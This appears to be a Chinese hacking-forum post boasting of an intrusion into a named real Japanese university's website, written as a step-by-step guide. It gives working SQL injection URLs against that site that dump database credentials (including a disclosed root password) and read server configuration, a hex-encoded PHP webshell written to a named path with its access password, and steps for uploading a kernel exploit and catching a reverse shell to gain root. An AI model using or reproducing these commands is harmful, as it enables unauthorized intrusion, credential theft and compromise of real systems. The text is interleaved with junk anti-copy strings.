入侵日本同志社大学

admin

入侵日本同志社大学技术分析
/ z3 w1 J/ o. y1 g" _
8 m% l1 z  g# b& dhttp://www.doshisha.ac.jp/chs/news/index.php?i=-1
然后联合查询，猜字段，查版本，查密码，读取文件…….就是各种查啊，语句是：
) T5 Z5 ^0 ~% v
6 m+ @6 @0 j0 |+ f  lhttp://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file(‘/etc/httpd/conf/httpd.conf’),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user

1 ~; g2 O* M2 C, T
! _* p% s4 [0 t' h) |/ K6 ~
//@@datadir为数据库文件路径
5 x8 @. _  ~( v1 {; Z/ |. x
2 x+ I# Z# N* P* Z* G" U
//load_file读取网站容器apache的配置文件

3 U' l) `7 a/ N
/ n' n  j6 m. t+ {; k' u* c//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
+ j% p) T0 n" a9 j9 @+ i& d复制代码

2 p( g; z, }# X: R2 Z0 D虽然解得MySQL的root账户密码为mysql00，但是host为localhost，只允许本机登陆，所以用处不大。
) {/ @# N  l' h, ~9 o
而且Apache的配置文件显示，服务器拒绝非该大学的ip访问/admin/和phpMyAdmin，所以即使爆出管理员账户密码也没用。
. c( t+ x7 n0 E8 K9 m; y(大家对以上各种查和语句不太懂的可以参考以下文章：http://bbs.blackbap.org/thread-2243-1-1.html)

# t5 g, K; F7 x* t前面load_file是因为发现了各文件夹权限限制的死，不允许外校ip登陆，所以就猜了一下apache的配置文件绝对路径为默认，后来发现还真的是默认的路径。
! b% a" ?0 J) m2 S2 h8 T/ k如果知道怎么猜apache配置文件的路径的请参考以下文章：http://bbs.blackbap.org/thread-2242-1-1.html
! J9 M7 m6 O3 a5 t% C2 K; I0 k3 i8 F
既然已经知道了Apache的配置文件的内容，我们也就轻易知道了网站物理路径，路径为：/http/www/koho/
虽然/admin和phpMyAdmin的目录都限制了，但是想了想，我们只要有注入点就可以可以写入shell了，因为php的GPC为off，怎么判断为off我就不说了。
6 p+ d% f, D' G9 ^: v) u* u直接写一句话：
+ B' Q" C- Q. V
http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+’/http/www/koho/english/engnews_img/aa.php’#


8 \- t! E% U$ W$ M$ S; y
//最后的#是为了闭合前面的语句


/*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E


为一句话<?php @eval($_POST['cmd']);?>的HEX编码，不懂(HEX编码)的话Google一下就好*/

1 s2 Z, r: `7 i! g# |" s5 G
7 x5 v5 S! b( q+ f: V//如果直接select 一句话 into outfile ‘路径’会提示字段数不同，所以select 1,2,3,4…来执行注入语句

: K. ~  a$ j: r! G, Q
$ p+ e9 n/ l1 a# L" ^//后面的0x3c3f2f2a和0x2a2f3f3e分别为’<?php //’的和’?>’HEX因为select后面的3,4,5,6会被写入webshell中，可能会导致一句话执行错误
//所以最后aa.php的内容就是”<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>”
9 [- D0 M, x* C; K. v复制代码
: w9 f3 E/ o8 `! r' _2 }. A# K
HEX其实就是十六进制编码，不知道这个编码的话，去搜一下好了，HEX编码转换在线本地各种工具各种有
- Z& U/ Y$ `7 c3 T% C0 v1 Z通过上述注入语句，我们就得到了一句话木马:


/ B1 Q' [9 q$ d/ Y4 G' Z) u

% E4 Y* Z4 z7 z5 s
, p+ S0 m" }1 i5 yhttp://www.doshisha.ac.jp/english/engnews_img/aa.php
7 P1 k& Q+ a! k% ?# g& y复制代码

用菜刀连接，密码是cmd，如图所示：
; N2 [3 A, l1 x+ ]然后在命令提示行里看了一下，现在的权限是：

之后按照惯例我看了一下/tmp/文件夹，发现/TMP/权限居然被禁掉了，很少有服务器禁掉这个文件夹的。
好在赋权给这个文件夹不需要root，直接执行赋权语句：





chmod +x /tmp/
复制代码
' D. W3 L1 l4 x, n3 y' z% K9 E
- S/ E2 m. ?! @, H在这说一下，linux里面的文件夹跟文件一样，执行命令自然也可以按照像文件一样的执行
然后就查了一下内核版本：
( K8 o* @: Y1 ^4 Z
! ^' ~  n# X+ v! Q) ^. d
% [1 l5 n$ d! d  T, I6 r


7 [( l! D' u8 j. k1 yuname-a
7 d3 V' a# B. V& B  Q3 w9 G5 P) \
: l$ J* ?. C3 H  r- \
4 O  X& `1 F% f7 H3 n9 D/ L' F" i# l//其实lsb_release -a
复制代码
! M! O. q$ X) K" k
如图所示：

5 Z# V* V2 T( ^$ z* Y内核版本：linux mainz1 2.6.28-194.e15
系统描述为：Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本！~然后传到/tmp/文件夹

% e7 v9 r: J% ?0 E/ h/ W: C2 O% n3 Q) f然后给予执行权限
* a, F% \2 F6 U一般我都是传上去c源文件，然后”gcc -o /tmp/程序 /tmp/C源码”这样，如果gcc不能用，在其他机器编译好了直接传上去其实也可以，就像这样
1 Y5 W' \  R0 _  I
; s) i# H2 g, r7 h
# V/ @+ ?% ^4 B# ?6 O/ X! n' A; p
, r! ^, o4 ]# P! }* _3 N+ G

; i; e# D0 l( t3 s! h. i4 }: e/ j8 Uchmod +x /tmp/2.6.18-194
复制代码 然后直接执行！~
) P" \  r" N; V: j
总结：
这个注入点的基本思路就是，发现MySQL账户为root，GPC设置为off，搞到了物理路径就直接写Webshell了
, N. }* g1 s. j2 v+ Q; e提权部分原理就是，本地监听端口，将对方机器反弹回cmdshell来，然后把和内核版本对应的EXP传上去，编译运行，得到root